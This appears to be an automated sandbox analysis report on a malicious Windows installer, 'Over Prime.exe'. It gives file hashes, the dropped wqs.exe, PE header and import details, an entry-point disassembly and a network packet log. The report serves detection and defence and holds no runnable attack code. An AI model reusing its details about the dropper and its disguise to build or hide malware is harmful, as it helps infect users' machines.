SHA-256:	41428F0B2DAE612C5BB8A9E8BBFF0E1D49A2CD1F05F370B7B2C3715FE6C22BD1
SHA-512:	718FFF5650CF758B7E88889D422AEA6218544411C20240F6BF4AA39DF9B57988C9E51F767B4D3DFB3351FE6EFABA40C056C12695237F3105E2564053C3892F05
Malicious:	false
Preview:	.0].T.F.C8.>..#.k?..2..l..X......A.{.,........6..luk.>.AB....`.....;.......K....T.....d....C.E.!.....L.^[.....QZd.S.bjs8u...K1.:....5

C:\Users\user\AppData\Roaming\wqs.exe

Download File

Process:	C:\Users\user\Desktop\Over Prime.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	339006
Entropy (8bit):	6.2843099136866885
Encrypted:	false
SSDEEP:	6144:vbE/HUDT8JwKtuGOwE4hpn7v7t1bzvYX6dt:vbb8JwKkx8hZ7x1fvcGt
MD5:	96F33F92C952C6D74C07974F375F81EE
SHA1:	BB5EF9A71160C8CD20791EC1A4BFDC21C7A30F00
SHA-256:	358108556D528DCC244AD0ADE4E553A072D6E6E0A917CF51CF1BFE7A20C1D2E9
SHA-512:	DF7A8DD013B2D412802966E02AF9D9C7FE6E37A78772E1830653D344295F07945A38A8A3039C276891A970A36DDCD0146CCAA56BAA2B97FEFC691B9216A4CFA0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.......................................@..........................................................................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wqs.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Over Prime.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	2097152
Entropy (8bit):	4.510719757571668
Encrypted:	false
SSDEEP:	12288:5ysMY6/amIj6AB84iTd+vXlnDhSEt+d5X+rEhFRNcElKOZdyWhUag6VSzc:5rj6AB84iTd+vXlnD0FlyWhUag6VSzc
MD5:	3FBA5FC4071B70A65BADC7237ACBFF19
SHA1:	9D03FCE5DA699CC80A539164941A29D832A84667
SHA-256:	74DFC6693606E6045A789E2F728DC4E7385BE21EF3D7BC3578088334DF5C5EA8
SHA-512:	E3C9B50B7EFCBA69C246241C8610E40F2D3E82C6ACB58D82122BC5B0EEDB3FE9A337B39C57B0F1060E3C17550F99058B8D20F5D1F14DBB220CE5B4902AC5AE71
Malicious:	false
Preview:	regf........5.#.^................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtmvn.}+t..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.2843099136866885
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Over Prime.exe
File size:	339006
MD5:	96f33f92c952c6d74c07974f375f81ee
SHA1:	bb5ef9a71160c8cd20791ec1a4bfdc21c7a30f00
SHA256:	358108556d528dcc244ad0ade4e553a072d6e6e0a917cf51cf1bfe7a20c1d2e9
SHA512:	df7a8dd013b2d412802966e02af9d9c7fe6e37a78772e1830653d344295f07945a38a8a3039c276891a970a36ddcd0146ccaa56baa2b97fefc691b9216a4cfa0
SSDEEP:	6144:vbE/HUDT8JwKtuGOwE4hpn7v7t1bzvYX6dt:vbb8JwKkx8hZ7x1fvcGt
TLSH:	1874D0663B94D811C4B24F318D37D6661678BCEE6EACCB0336E1BB2E38315E1A50B745
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

File Icon


Icon Hash:	b2b2b07979f8c4d8

Static PE Info

General

Entrypoint:	0x40352d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F8C1C2212AAh
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F8C1C22127Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [00434FB8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8610	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x61000	0x28490	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6897	0x6a00	False	0.666126179245	data	6.45839821493	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x14a6	0x1600	False	0.439275568182	data	5.02410928126	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2b018	0x600	False	0.521484375	data	4.15458210409	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x36000	0x2b000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x61000	0x28490	0x28600	False	0.310522687693	data	3.95977776925	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x61358	0x10828	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x71b80	0x94a8	data	English	United States
RT_ICON	0x7b028	0x5488	data	English	United States
RT_ICON	0x804b0	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x846d8	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x86c80	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x87d28	0x988	data	English	United States
RT_ICON	0x886b0	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x88b18	0x100	data	English	United States
RT_DIALOG	0x88c18	0x11c	data	English	United States
RT_DIALOG	0x88d38	0xc4	data	English	United States
RT_DIALOG	0x88e00	0x60	data	English	United States
RT_GROUP_ICON	0x88e60	0x76	data	English	United States
RT_VERSION	0x88ed8	0x278	data	English	United States
RT_MANIFEST	0x89150	0x33e	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Version Infos

Description	Data
LegalCopyright	Cesuraduksedren122
FileVersion	30.9.7
CompanyName	Hemisy
LegalTrademarks	besejrendesnumin
Comments	Stomiond211
ProductName	Husa58
FileDescription	JABBERERSOVER
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 30, 2022 14:45:07.361493111 CEST	49737	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:07.361567974 CEST	443	49737	142.250.186.110	192.168.11.20
May 30, 2022 14:45:07.361790895 CEST	49737	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:07.385004997 CEST	49737	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:07.385062933 CEST	443	49737	142.250.186.110	192.168.11.20
May 30, 2022 14:45:07.417212009 CEST	443	49737	142.250.186.110	192.168.11.20
May 30, 2022 14:45:07.417395115 CEST	49737	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:07.418196917 CEST	443	49737	142.250.186.110	192.168.11.20
May 30, 2022 14:45:07.418414116 CEST	49737	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:07.525008917 CEST	49737	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:07.525676012 CEST	443	49737	142.250.186.110	192.168.11.20
May 30, 2022 14:45:07.525927067 CEST	49737	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:07.532000065 CEST	49737	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:07.574558973 CEST	443	49737	142.250.186.110	192.168.11.20
May 30, 2022 14:45:08.080878019 CEST	443	49737	142.250.186.110	192.168.11.20
May 30, 2022 14:45:08.081058979 CEST	443	49737	142.250.186.110	192.168.11.20
May 30, 2022 14:45:08.081090927 CEST	49737	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:08.081259966 CEST	49737	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:08.082742929 CEST	49737	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:08.082806110 CEST	443	49737	142.250.186.110	192.168.11.20
May 30, 2022 14:45:08.236773968 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.236849070 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.237099886 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.237435102 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.237485886 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.286732912 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.286961079 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.289726019 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.290029049 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.293955088 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.293994904 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.294675112 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.294862986 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.295370102 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.338546038 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.502182961 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.502444983 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.502896070 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.503137112 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.503530025 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.503771067 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.504904032 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.505143881 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.505176067 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.505198956 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.505510092 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.507843018 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.508184910 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.509870052 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.510044098 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.510121107 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.510124922 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.510173082 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.510207891 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.510356903 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.510663986 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.510921955 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.510960102 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.511238098 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.511472940 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.511888027 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.511951923 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.512141943 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.512270927 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.512319088 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.512368917 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.512504101 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.512756109 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.512916088 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.512954950 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.513151884 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.513389111 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.513597965 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.513643026 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.513853073 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.514067888 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.514234066 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.514250040 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.514276028 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.514456987 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.515157938 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.515326023 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.515338898 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.515367031 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.515573978 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.515959024 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.516143084 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.516171932 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.516217947 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.516335011 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.516370058 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.516796112 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.516956091 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.516988039 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.517014027 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.517189026 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.517235994 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.517440081 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.517792940 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.517956972 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.517962933 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.518013000 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.518157005 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.518193960 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.518681049 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.518860102 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.518934965 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.518934965 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.518980980 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.519035101 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.519182920 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.519399881 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.519563913 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.519602060 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.519623995 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.519768000 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.519784927 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.519788027 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.519813061 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.520020962 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.520328999 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.520518064 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.520607948 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.520644903 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.520695925 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.520816088 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.520940065 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.520998001 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.521240950 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.521264076 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.521306038 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.521408081 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.521470070 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.521528006 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.521572113 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.521630049 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.521800041 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.521845102 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.522058964 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.522099018 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.522255898 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.522281885 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.522425890 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.523255110 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.523413897 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.523518085 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.523562908 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.523575068 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.523710966 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.523736954 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.523777962 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.523880959 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.523919106 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.523936987 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.523951054 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.524089098 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.524372101 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.524528980 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.524545908 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.524583101 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.524735928 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.524775982 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.524800062 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.525026083 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.525059938 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.525084019 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.525232077 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.525279999 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.525446892 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.525456905 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.525480032 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.525645971 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.525661945 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.525697947 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.525918007 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.526149988 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.526343107 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.526390076 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.526437044 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.526516914 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.526595116 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.526617050 CEST	443	49738	142.250.185.65	192.168.11.20
